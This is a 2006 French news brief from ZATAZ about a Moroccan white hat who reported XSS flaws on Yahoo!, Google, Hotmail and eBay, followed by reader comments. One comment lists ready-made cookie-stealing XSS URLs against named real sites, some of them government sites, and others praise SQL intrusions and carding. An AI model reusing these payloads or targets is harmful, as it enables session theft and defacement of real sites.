ZATAZ : un white hat marocain découvre des failles sur des grands portails internationaux


ZATAZ le 3 Février 2006


Il se nomme Daftrix, un white hat marocain, traduisez un hacker. Il vient de nous prévenir de la découverte d'une bonne dizaine de failles, de type XSS, sur des sites tels que Yahoo!, Google, Hotmail, linuxmail, Hackermail ou encore eBay.


Dans certains cas, il était tout à fait possible de rentrer dans le compte mel d'une victime. Dans d'autres cas, un internaute, via un lien frauduleux, peut se faire piéger.

L'ensemble des sociétés ont été contactées afin que soit mis en place les correctifs adéquates.

Prudence si vous utilisez un de ces sites. N'employez que les urls officiels pour atteindre la page de connexion. 

________________________Dans la même rubrique_________________________

« »


Commentaires

1.Posté par Jonas le 25/03/2006 15:24
Amine,je te connais depuis quelques semaines maintenant, eh bah, jvou dit ke ce mec c une bombe ! en plus d'être tres tres fort, il est aussi tres généreux ;)
http://www.ecoleduweb.com

2.Posté par sara84 le 10/10/2006 02:55
j'aimerai bien connaitre cet homme.
1e du meme domaine;)
l'informatique

3.Posté par farissi mouna le 14/08/2007 19:40
salut c la 1ere fois ke je visite ce site j'espere trouver du travail j'es un bac+4 en finanace et management et j'ai 26 ans

4.Posté par oshacker le 21/11/2007 11:53
salut cava ,
mais si elle ya un grand hacker qui s apelle meloulisi je pens qu elle est de meknes elle a trouver plusieur faille sql inhect et xss dans plusieur sit marocain

voila une faille qui s apelle xss qui te donne les info pwd de victim et voila des sit par exp :
- http://www.marcaria.com ----> http://www.marcaria.com/register/user/account_info.asp?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

- http://www.maromania.com ----> http://www.maromania.com/cwhoiscart.php?cwaction=lookup&domain=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

- http://www.marocfree.net
-http://www.marocfree.net/Annonces/searchResult.asp?key=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E


-http://top.marocnet.nl
-http://top.marocnet.nl/index.php?from=90&cid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

- http://www.bayanealyaoume.ma/ elle ne veux pas qu elle soit puplier ....

- http://www.imist.ma ----> http://www.imist.ma/competences_ar/formAfficher.php?num_cher=327&page=15&debut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

- http://www.vista.ma
http://www.vista.ma/watch.php?video=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

- http://www.lemaroc.org ----- > http://www.lemaroc.org/videos/watch.php?video=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%
et pas just les sit marocain voila des sit gouvernement :

- http://www.zulfiedu.gov.sa/dlm/categ.php?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

http://www.sante.gov.mg/index.php?option=com_events&task=view_detail&agid=77&year=2007&month=03&day=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E mambo

http://www.ourdocuments.gov/content.php?flash=true&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3Emeloulisi%3C/h1%3E%3C/marquee%3E

...........................

bon chance
oshacker



5.Posté par xxx le 12/12/2007 12:27
salut a tous je conner un peux meloulisi je pens qu elel soit le meilleur car elle vas au bon rout elle donne ce qu elle peux d aide a tous tout des faille des shopadmin ........... by elle wlah et je veux le trouve ou elle abite car elle a bub un kernel odifier a leur besoin de hack elle est meilleur wlah elle m adonner
bah bon chance a tous les marocain

6.Posté par mouha le 25/12/2007 18:03
salut
bon pour meloulisi je le conner bien et les bien dans le domain informatique et sur tou hacker et le carding elle bon pour ce jeun homme elle donne des auroformation pour tous
bon chance pour elle

7.Posté par broken ice le 15/01/2008 20:46
salut a tous meloulisi je le conner bien elle pu entre au serveur bayanalyawme et au mobileiam et aussi au menara wlah avec une injection je pens sql et j ai un grand video education pour elle elle est le king of sql
je le souhaite le bon rout et elle fait prendre leur attention car c est tres dangereux mmmm

0day menara ce n ai pas facile oui 0 day
ok bon chance pour tous et pour elle
bye broken ice 4 you

bye

8.Posté par kof le 18/02/2008 21:35
salut cava
mais oui le maroc et besoin des vrai hacker pour le dit nom israel et nom usa
meloulisi elle dans le bon chemin elle va arivai incha2e lah
car elle decouvrire des faille et ne veux plus le publier dans les sit de security pour que le nebie les bebe de hacker ne trouve plus de dork elle envoyer a le programeur ou scripteur pour le couriger

moi je suis un victim de meloulisi mais elle bon wlah elle ma donner la failler + comment je le courige si elle est publier je ne trouve aucun mot pour le dit pour elle wlah allez bon chance pour toi mon frere meloulisi
he j ai leur email elle ma dit qu elle vas changer leur user : ellle va devenir oulimelsi

:d:d:d je ne onner pas pour quoi bon chance a vous